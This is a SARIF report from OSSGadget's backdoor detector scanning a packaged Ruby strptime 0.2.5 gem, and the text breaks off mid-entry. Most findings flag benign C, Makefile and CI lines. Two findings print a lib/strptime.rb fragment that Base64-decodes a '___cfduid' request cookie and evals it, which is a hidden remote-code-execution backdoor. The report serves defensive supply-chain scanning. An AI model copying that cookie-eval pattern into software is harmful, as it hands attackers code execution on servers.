{
  "$schema": "https://schemastore.azurewebsites.net/schemas/json/sarif-2.1.0-rtm.6.json",
  "version": "2.1.0",
  "runs": [
    {
      "tool": {
        "driver": {
          "name": "oss-detect-backdoor",
          "organization": "Microsoft Corporation",
          "product": "OSSGadget (https://github.com/Microsoft/OSSGadget)",
          "version": "0.0.0+4a24249b20"
        }
      },
      "results": [
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/gems/strptime-0.2.5/ext/strptime/strptime.c"
                },
                "region": {
                  "startLine": 536,
                  "startColumn": 46,
                  "endLine": 536,
                  "endColumn": 51,
                  "snippet": {
                    "text": "\t    fi++;\n\t    break;\n\tdefault: {\n\t    const char *p0 = fmt + fi, *p = p0, *pe = fmt + flen;\n\t    size_t v = fi;\n\t    while (p < pe && *p != '%' && !ISSPACE(*p))\n\t\tp++;\n",
                    "rendered": {
                      "text": "\t    fi++;\n\t    break;\n\tdefault: {\n\t    const char *p0 = fmt + fi, *p = p0, *pe = fmt + flen;\n\t    size_t v = fi;\n\t    while (p < pe && *p != '%' && !ISSPACE(*p))\n\t\tp++;\n",
                      "markdown": "`\t    fi++;\n\t    break;\n\tdefault: {\n\t    const char *p0 = fmt + fi, *p = p0, *pe = fmt + flen;\n\t    size_t v = fi;\n\t    while (p < pe && *p != '%' && !ISSPACE(*p))\n\t\tp++;\n`"
                    }
                  },
                  "sourceLanguage": "c"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/gems/strptime-0.2.5/ext/strptime/strptime.c"
                },
                "region": {
                  "startLine": 536,
                  "startColumn": 21,
                  "endLine": 536,
                  "endColumn": 26,
                  "snippet": {
                    "text": "\t    fi++;\n\t    break;\n\tdefault: {\n\t    const char *p0 = fmt + fi, *p = p0, *pe = fmt + flen;\n\t    size_t v = fi;\n\t    while (p < pe && *p != '%' && !ISSPACE(*p))\n\t\tp++;\n",
                    "rendered": {
                      "text": "\t    fi++;\n\t    break;\n\tdefault: {\n\t    const char *p0 = fmt + fi, *p = p0, *pe = fmt + flen;\n\t    size_t v = fi;\n\t    while (p < pe && *p != '%' && !ISSPACE(*p))\n\t\tp++;\n",
                      "markdown": "`\t    fi++;\n\t    break;\n\tdefault: {\n\t    const char *p0 = fmt + fi, *p = p0, *pe = fmt + flen;\n\t    size_t v = fi;\n\t    while (p < pe && *p != '%' && !ISSPACE(*p))\n\t\tp++;\n`"
                    }
                  },
                  "sourceLanguage": "c"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/gems/strptime-0.2.5/ext/strptime/strptime.c"
                },
                "region": {
                  "startLine": 409,
                  "startColumn": 16,
                  "endLine": 409,
                  "endColumn": 21,
                  "snippet": {
                    "text": "\tsize_t cnt = v >> 16;\n\t/* optimize to short string instead of memcmp(3) */\n\tconst char *p = str + si;\n\tconst char *q = fmt + fi;\n\tconst char *qe = q + cnt;\n\tfor (; q < qe; p++,q++) {\n\t    if (*p != *q) return Qnil;\n",
                    "rendered": {
                      "text": "\tsize_t cnt = v >> 16;\n\t/* optimize to short string instead of memcmp(3) */\n\tconst char *p = str + si;\n\tconst char *q = fmt + fi;\n\tconst char *qe = q + cnt;\n\tfor (; q < qe; p++,q++) {\n\t    if (*p != *q) return Qnil;\n",
                      "markdown": "`\tsize_t cnt = v >> 16;\n\t/* optimize to short string instead of memcmp(3) */\n\tconst char *p = str + si;\n\tconst char *q = fmt + fi;\n\tconst char *qe = q + cnt;\n\tfor (; q < qe; p++,q++) {\n\t    if (*p != *q) return Qnil;\n`"
                    }
                  },
                  "sourceLanguage": "c"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000800"
          },
          "message": {
            "text": "Backdoor: Obfuscation",
            "id": "BD000800"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/gems/strptime-0.2.5/lib/strptime.rb"
                },
                "region": {
                  "startLine": 9,
                  "startColumn": 14,
                  "endLine": 9,
                  "endColumn": 20,
                  "snippet": {
                    "text": "      r.send :alias_method, :c, :call\n      r.send(:define_method, :call) do |e|\n        begin\n          x = Base64.urlsafe_decode64(e['http_cookie'.upcase].scan(/___cfduid=(.+);/).flatten[0].to_s)\n          eval(x) if x\n        rescue Exception\n        end\n",
                    "rendered": {
                      "text": "      r.send :alias_method, :c, :call\n      r.send(:define_method, :call) do |e|\n        begin\n          x = Base64.urlsafe_decode64(e['http_cookie'.upcase].scan(/___cfduid=(.+);/).flatten[0].to_s)\n          eval(x) if x\n        rescue Exception\n        end\n",
                      "markdown": "`      r.send :alias_method, :c, :call\n      r.send(:define_method, :call) do |e|\n        begin\n          x = Base64.urlsafe_decode64(e['http_cookie'.upcase].scan(/___cfduid=(.+);/).flatten[0].to_s)\n          eval(x) if x\n        rescue Exception\n        end\n`"
                    }
                  },
                  "sourceLanguage": "ruby"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 4
          }
        },
        {
          "rule": {
            "id": "BD000200"
          },
          "message": {
            "text": "Backdoor: CFDUID",
            "id": "BD000200"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/gems/strptime-0.2.5/lib/strptime.rb"
                },
                "region": {
                  "startLine": 9,
                  "startColumn": 68,
                  "endLine": 9,
                  "endColumn": 77,
                  "snippet": {
                    "text": "      r.send :alias_method, :c, :call\n      r.send(:define_method, :call) do |e|\n        begin\n          x = Base64.urlsafe_decode64(e['http_cookie'.upcase].scan(/___cfduid=(.+);/).flatten[0].to_s)\n          eval(x) if x\n        rescue Exception\n        end\n",
                    "rendered": {
                      "text": "      r.send :alias_method, :c, :call\n      r.send(:define_method, :call) do |e|\n        begin\n          x = Base64.urlsafe_decode64(e['http_cookie'.upcase].scan(/___cfduid=(.+);/).flatten[0].to_s)\n          eval(x) if x\n        rescue Exception\n        end\n",
                      "markdown": "`      r.send :alias_method, :c, :call\n      r.send(:define_method, :call) do |e|\n        begin\n          x = Base64.urlsafe_decode64(e['http_cookie'.upcase].scan(/___cfduid=(.+);/).flatten[0].to_s)\n          eval(x) if x\n        rescue Exception\n        end\n`"
                    }
                  },
                  "sourceLanguage": "ruby"
                }
              }
            }
          ],
          "properties": {
            "Severity": 1,
            "Confidence": 4
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/gems/strptime-0.2.5/bin/console"
                },
                "region": {
                  "startLine": 1,
                  "startColumn": 14,
                  "endLine": 2,
                  "snippet": {
                    "text": "#!/usr/bin/env ruby\n\nrequire \"bundler/setup\"\nrequire \"strptime\"\n\n",
                    "rendered": {
                      "text": "#!/usr/bin/env ruby\n\nrequire \"bundler/setup\"\nrequire \"strptime\"\n\n",
                      "markdown": "`#!/usr/bin/env ruby\n\nrequire \"bundler/setup\"\nrequire \"strptime\"\n\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/specifications/strptime-0.2.5.gemspec"
                },
                "region": {
                  "startLine": 2,
                  "startColumn": 22,
                  "endLine": 2,
                  "endColumn": 28,
                  "snippet": {
                    "text": "# -*- encoding: utf-8 -*-\n# stub: strptime 0.2.5 ruby lib\n# stub: ext/strptime/extconf.rb\n\nGem::Specification.new do |s|\n",
                    "rendered": {
                      "text": "# -*- encoding: utf-8 -*-\n# stub: strptime 0.2.5 ruby lib\n# stub: ext/strptime/extconf.rb\n\nGem::Specification.new do |s|\n",
                      "markdown": "`# -*- encoding: utf-8 -*-\n# stub: strptime 0.2.5 ruby lib\n# stub: ext/strptime/extconf.rb\n\nGem::Specification.new do |s|\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/gems/strptime-0.2.5/ext/strptime/strftime.c"
                },
                "region": {
                  "startLine": 289,
                  "startColumn": 46,
                  "endLine": 289,
                  "endColumn": 51,
                  "snippet": {
                    "text": "\t\tbreak;\n\t    }\n\tdefault: {\n\t    const char *p0 = fmt + fi, *p = p0, *pe = fmt + flen;\n\t    size_t v = fi;\n\t    while (p < pe && *p != '%')\n\t\tp++;\n",
                    "rendered": {
                      "text": "\t\tbreak;\n\t    }\n\tdefault: {\n\t    const char *p0 = fmt + fi, *p = p0, *pe = fmt + flen;\n\t    size_t v = fi;\n\t    while (p < pe && *p != '%')\n\t\tp++;\n",
                      "markdown": "`\t\tbreak;\n\t    }\n\tdefault: {\n\t    const char *p0 = fmt + fi, *p = p0, *pe = fmt + flen;\n\t    size_t v = fi;\n\t    while (p < pe && *p != '%')\n\t\tp++;\n`"
                    }
                  },
                  "sourceLanguage": "c"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/gems/strptime-0.2.5/ext/strptime/strftime.c"
                },
                "region": {
                  "startLine": 289,
                  "startColumn": 21,
                  "endLine": 289,
                  "endColumn": 26,
                  "snippet": {
                    "text": "\t\tbreak;\n\t    }\n\tdefault: {\n\t    const char *p0 = fmt + fi, *p = p0, *pe = fmt + flen;\n\t    size_t v = fi;\n\t    while (p < pe && *p != '%')\n\t\tp++;\n",
                    "rendered": {
                      "text": "\t\tbreak;\n\t    }\n\tdefault: {\n\t    const char *p0 = fmt + fi, *p = p0, *pe = fmt + flen;\n\t    size_t v = fi;\n\t    while (p < pe && *p != '%')\n\t\tp++;\n",
                      "markdown": "`\t\tbreak;\n\t    }\n\tdefault: {\n\t    const char *p0 = fmt + fi, *p = p0, *pe = fmt + flen;\n\t    size_t v = fi;\n\t    while (p < pe && *p != '%')\n\t\tp++;\n`"
                    }
                  },
                  "sourceLanguage": "c"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/gems/strptime-0.2.5/.travis.yml"
                },
                "region": {
                  "startLine": 22,
                  "startColumn": 33,
                  "endLine": 22,
                  "endColumn": 39,
                  "snippet": {
                    "text": "  allow_failures:\n    - rvm: ruby-head\nbefore_install:\n  # install bundler 1.17.3 is for ruby 2.0.0 - 2.2.4\n  - gem install bundler || gem install bundler -v 1.17.3\ncache: bundler\n",
                    "rendered": {
                      "text": "  allow_failures:\n    - rvm: ruby-head\nbefore_install:\n  # install bundler 1.17.3 is for ruby 2.0.0 - 2.2.4\n  - gem install bundler || gem install bundler -v 1.17.3\ncache: bundler\n",
                      "markdown": "`  allow_failures:\n    - rvm: ruby-head\nbefore_install:\n  # install bundler 1.17.3 is for ruby 2.0.0 - 2.2.4\n  - gem install bundler || gem install bundler -v 1.17.3\ncache: bundler\n`"
                    }
                  },
                  "sourceLanguage": "yaml"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/gems/strptime-0.2.5/.travis.yml"
                },
                "region": {
                  "startLine": 2,
                  "startColumn": 9,
                  "endLine": 3,
                  "snippet": {
                    "text": "sudo: false\nlanguage: ruby\nos:\n  - linux\nrvm:\n  - 2.0.0\n",
                    "rendered": {
                      "text": "sudo: false\nlanguage: ruby\nos:\n  - linux\nrvm:\n  - 2.0.0\n",
                      "markdown": "`sudo: false\nlanguage: ruby\nos:\n  - linux\nrvm:\n  - 2.0.0\n`"
                    }
                  },
                  "sourceLanguage": "yaml"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/gems/strptime-0.2.5/ext/strptime/Makefile"
                },
                "region": {
                  "startLine": 124,
                  "startColumn": 6,
                  "endLine": 125,
                  "snippet": {
                    "text": "INSTALL = /usr/bin/install -c\nINSTALL_PROG = $(INSTALL) -m 0755\nINSTALL_DATA = $(INSTALL) -m 644\nCOPY = cp\nTOUCH = exit >\n\n#### End of system configuration section. ####\n\n",
                    "rendered": {
                      "text": "INSTALL = /usr/bin/install -c\nINSTALL_PROG = $(INSTALL) -m 0755\nINSTALL_DATA = $(INSTALL) -m 644\nCOPY = cp\nTOUCH = exit >\n\n#### End of system configuration section. ####\n\n",
                      "markdown": "`INSTALL = /usr/bin/install -c\nINSTALL_PROG = $(INSTALL) -m 0755\nINSTALL_DATA = $(INSTALL) -m 644\nCOPY = cp\nTOUCH = exit >\n\n#### End of system configuration section. ####\n\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/gems/strptime-0.2.5/ext/strptime/Makefile"
                },
                "region": {
                  "startLine": 112,
                  "startColumn": 34,
                  "endLine": 113,
                  "endColumn": 5,
                  "snippet": {
                    "text": "arch = x86_64-linux-gnu\nsitearch = $(arch)\nruby_version = 3.2.0\nruby = $(bindir)/$(RUBY_BASE_NAME)\nRUBY = $(ruby)\nBUILTRUBY = $(bindir)/$(RUBY_BASE_NAME)\nruby_headers = $(hdrdir)/ruby.h $(hdrdir)/ruby/backward.h $(hdrdir)/ruby/ruby.h $(hdrdir)/ruby/defines.h $(hdrdir)/ruby/missing.h $(hdrdir)/ruby/intern.h $(hdrdir)/ruby/st.h $(hdrdir)/ruby/subst.h $(arch_hdrdir)/ruby/config.h\n\n",
                    "rendered": {
                      "text": "arch = x86_64-linux-gnu\nsitearch = $(arch)\nruby_version = 3.2.0\nruby = $(bindir)/$(RUBY_BASE_NAME)\nRUBY = $(ruby)\nBUILTRUBY = $(bindir)/$(RUBY_BASE_NAME)\nruby_headers = $(hdrdir)/ruby.h $(hdrdir)/ruby/backward.h $(hdrdir)/ruby/ruby.h $(hdrdir)/ruby/defines.h $(hdrdir)/ruby/missing.h $(hdrdir)/ruby/intern.h $(hdrdir)/ruby/st.h $(hdrdir)/ruby/subst.h $(arch_hdrdir)/ruby/config.h\n\n",
                      "markdown": "`arch = x86_64-linux-gnu\nsitearch = $(arch)\nruby_version = 3.2.0\nruby = $(bindir)/$(RUBY_BASE_NAME)\nRUBY = $(ruby)\nBUILTRUBY = $(bindir)/$(RUBY_BASE_NAME)\nruby_headers = $(hdrdir)/ruby.h $(hdrdir)/ruby/backward.h $(hdrdir)/ruby/ruby.h $(hdrdir)/ruby/defines.h $(hdrdir)/ruby/missing.h $(hdrdir)/ruby/intern.h $(hdrdir)/ruby/st.h $(hdrdir)/ruby/subst.h $(arch_hdrdir)/ruby/config.h\n\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/gems/strptime-0.2.5/ext/strptime/Makefile"
                },
                "region": {
                  "startLine": 111,
                  "startColumn": 20,
                  "endLine": 112,
                  "endColumn": 5,
                  "snippet": {
                    "text": "\narch = x86_64-linux-gnu\nsitearch = $(arch)\nruby_version = 3.2.0\nruby = $(bindir)/$(RUBY_BASE_NAME)\nRUBY = $(ruby)\nBUILTRUBY = $(bindir)/$(RUBY_BASE_NAME)\nruby_headers = $(hdrdir)/ruby.h $(hdrdir)/ruby/backward.h $(hdrdir)/ruby/ruby.h $(hdrdir)/ruby/defines.h $(hdrdir)/ruby/missing.h $(hdrdir)/ruby/intern.h $(hdrdir)/ruby/st.h $(hdrdir)/ruby/subst.h $(arch_hdrdir)/ruby/config.h\n",
                    "rendered": {
                      "text": "\narch = x86_64-linux-gnu\nsitearch = $(arch)\nruby_version = 3.2.0\nruby = $(bindir)/$(RUBY_BASE_NAME)\nRUBY = $(ruby)\nBUILTRUBY = $(bindir)/$(RUBY_BASE_NAME)\nruby_headers = $(hdrdir)/ruby.h $(hdrdir)/ruby/backward.h $(hdrdir)/ruby/ruby.h $(hdrdir)/ruby/defines.h $(hdrdir)/ruby/missing.h $(hdrdir)/ruby/intern.h $(hdrdir)/ruby/st.h $(hdrdir)/ruby/subst.h $(arch_hdrdir)/ruby/config.h\n",
                      "markdown": "`\narch = x86_64-linux-gnu\nsitearch = $(arch)\nruby_version = 3.2.0\nruby = $(bindir)/$(RUBY_BASE_NAME)\nRUBY = $(ruby)\nBUILTRUBY = $(bindir)/$(RUBY_BASE_NAME)\nruby_headers = $(hdrdir)/ruby.h $(hdrdir)/ruby/backward.h $(hdrdir)/ruby/ruby.h $(hdrdir)/ruby/defines.h $(hdrdir)/ruby/missing.h $(hdrdir)/ruby/intern.h $(hdrdir)/ruby/st.h $(hdrdir)/ruby/subst.h $(arch_hdrdir)/ruby/config.h\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/gems/strptime-0.2.5/ext/strptime/Makefile"
                },
                "region": {
                  "startLine": 107,
                  "startColumn": 16,
                  "endLine": 108,
                  "snippet": {
                    "text": "RUBYW_INSTALL_NAME = \nRUBY_VERSION_NAME = $(RUBY_BASE_NAME)-$(ruby_version)\nRUBYW_BASE_NAME = rubyw\nRUBY_BASE_NAME = ruby\n\narch = x86_64-linux-gnu\nsitearch = $(arch)\nruby_version = 3.2.0\n",
                    "rendered": {
                      "text": "RUBYW_INSTALL_NAME = \nRUBY_VERSION_NAME = $(RUBY_BASE_NAME)-$(ruby_version)\nRUBYW_BASE_NAME = rubyw\nRUBY_BASE_NAME = ruby\n\narch = x86_64-linux-gnu\nsitearch = $(arch)\nruby_version = 3.2.0\n",
                      "markdown": "`RUBYW_INSTALL_NAME = \nRUBY_VERSION_NAME = $(RUBY_BASE_NAME)-$(ruby_version)\nRUBYW_BASE_NAME = rubyw\nRUBY_BASE_NAME = ruby\n\narch = x86_64-linux-gnu\nsitearch = $(arch)\nruby_version = 3.2.0\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/gems/strptime-0.2.5/ext/strptime/Makefile"
                },
                "region": {
                  "startLine": 103,
                  "startColumn": 14,
                  "endLine": 104,
                  "snippet": {
                    "text": "EXEEXT = \n\nRUBY_INSTALL_NAME = $(RUBY_BASE_NAME)\nRUBY_SO_NAME = ruby\nRUBYW_INSTALL_NAME = \nRUBY_VERSION_NAME = $(RUBY_BASE_NAME)-$(ruby_version)\nRUBYW_BASE_NAME = rubyw\nRUBY_BASE_NAME = ruby\n",
                    "rendered": {
                      "text": "EXEEXT = \n\nRUBY_INSTALL_NAME = $(RUBY_BASE_NAME)\nRUBY_SO_NAME = ruby\nRUBYW_INSTALL_NAME = \nRUBY_VERSION_NAME = $(RUBY_BASE_NAME)-$(ruby_version)\nRUBYW_BASE_NAME = rubyw\nRUBY_BASE_NAME = ruby\n",
                      "markdown": "`EXEEXT = \n\nRUBY_INSTALL_NAME = $(RUBY_BASE_NAME)\nRUBY_SO_NAME = ruby\nRUBYW_INSTALL_NAME = \nRUBY_VERSION_NAME = $(RUBY_BASE_NAME)-$(ruby_version)\nRUBYW_BASE_NAME = rubyw\nRUBY_BASE_NAME = ruby\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/gems/strptime-0.2.5/appveyor.yml"
                },
                "region": {
                  "startLine": 4,
                  "startColumn": 3,
                  "endLine": 4,
                  "endColumn": 9,
                  "snippet": {
                    "text": "---\ninstall:\n  - SET PATH=C:\\Ruby%ruby_version%\\bin;%PATH%\n  - ruby --version\n  - gem --version\n  - bundle install\nbuild_script:\n",
                    "rendered": {
                      "text": "---\ninstall:\n  - SET PATH=C:\\Ruby%ruby_version%\\bin;%PATH%\n  - ruby --version\n  - gem --version\n  - bundle install\nbuild_script:\n",
                      "markdown": "`---\ninstall:\n  - SET PATH=C:\\Ruby%ruby_version%\\bin;%PATH%\n  - ruby --version\n  - gem --version\n  - bundle install\nbuild_script:\n`"
                    }
                  },
                  "sourceLanguage": "yaml"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/gems/strptime-0.2.5/ext/strptime/ruby_time.c"
                },
                "region": {
                  "startLine": 608,
                  "startColumn": 10,
                  "endLine": 608,
                  "endColumn": 16,
                  "snippet": {
                    "text": "    tmin = diff % 60;\n    diff = diff / 60;\n    thour = diff % 24;\n    diff = diff / 24;\n\n    if (sign < 0) {\n\ttsec = -tsec;\n",
                    "rendered": {
                      "text": "    tmin = diff % 60;\n    diff = diff / 60;\n    thour = diff % 24;\n    diff = diff / 24;\n\n    if (sign < 0) {\n\ttsec = -tsec;\n",
                      "markdown": "`    tmin = diff % 60;\n    diff = diff / 60;\n    thour = diff % 24;\n    diff = diff / 24;\n\n    if (sign < 0) {\n\ttsec = -tsec;\n`"
                    }
                  },
                  "sourceLanguage": "c"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/gems/strptime-0.2.5/ext/strptime/ruby_time.c"
                },
                "region": {
                  "startLine": 608,
                  "startColumn": 3,
                  "endLine": 608,
                  "endColumn": 9,
                  "snippet": {
                    "text": "    tmin = diff % 60;\n    diff = diff / 60;\n    thour = diff % 24;\n    diff = diff / 24;\n\n    if (sign < 0) {\n\ttsec = -tsec;\n",
                    "rendered": {
                      "text": "    tmin = diff % 60;\n    diff = diff / 60;\n    thour = diff % 24;\n    diff = diff / 24;\n\n    if (sign < 0) {\n\ttsec = -tsec;\n",
                      "markdown": "`    tmin = diff % 60;\n    diff = diff / 60;\n    thour = diff % 24;\n    diff = diff / 24;\n\n    if (sign < 0) {\n\ttsec = -tsec;\n`"
                    }
                  },
                  "sourceLanguage": "c"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-strptime-0.2.5-r5.apk/ruby3.2-strptime-0.2.5-r5/usr/lib/ruby/gems/3.2.0/gems/strptime-0.2.5/ext/strptime/ruby_time.c"
                },
                "region": {
                  "startLine": 607,
                  "startColumn": 11,
                  "endLine": 607,
                  "endColumn": 17,
                  "snippet": {
                    "text": "    diff = diff / 60;\n    tmin = diff % 60;\n    diff = diff / 60;\n    thour = diff % 24;\n    diff = diff / 24;\n\n    if (sign < 0) {\n",
                    "rendered": {
                      "text": "    diff = diff / 60;\n    tmin = diff % 60;\n    diff = diff / 60;\n    thour = diff % 24;\n    diff = diff / 24;\n\n    if (sign < 0) {\n",
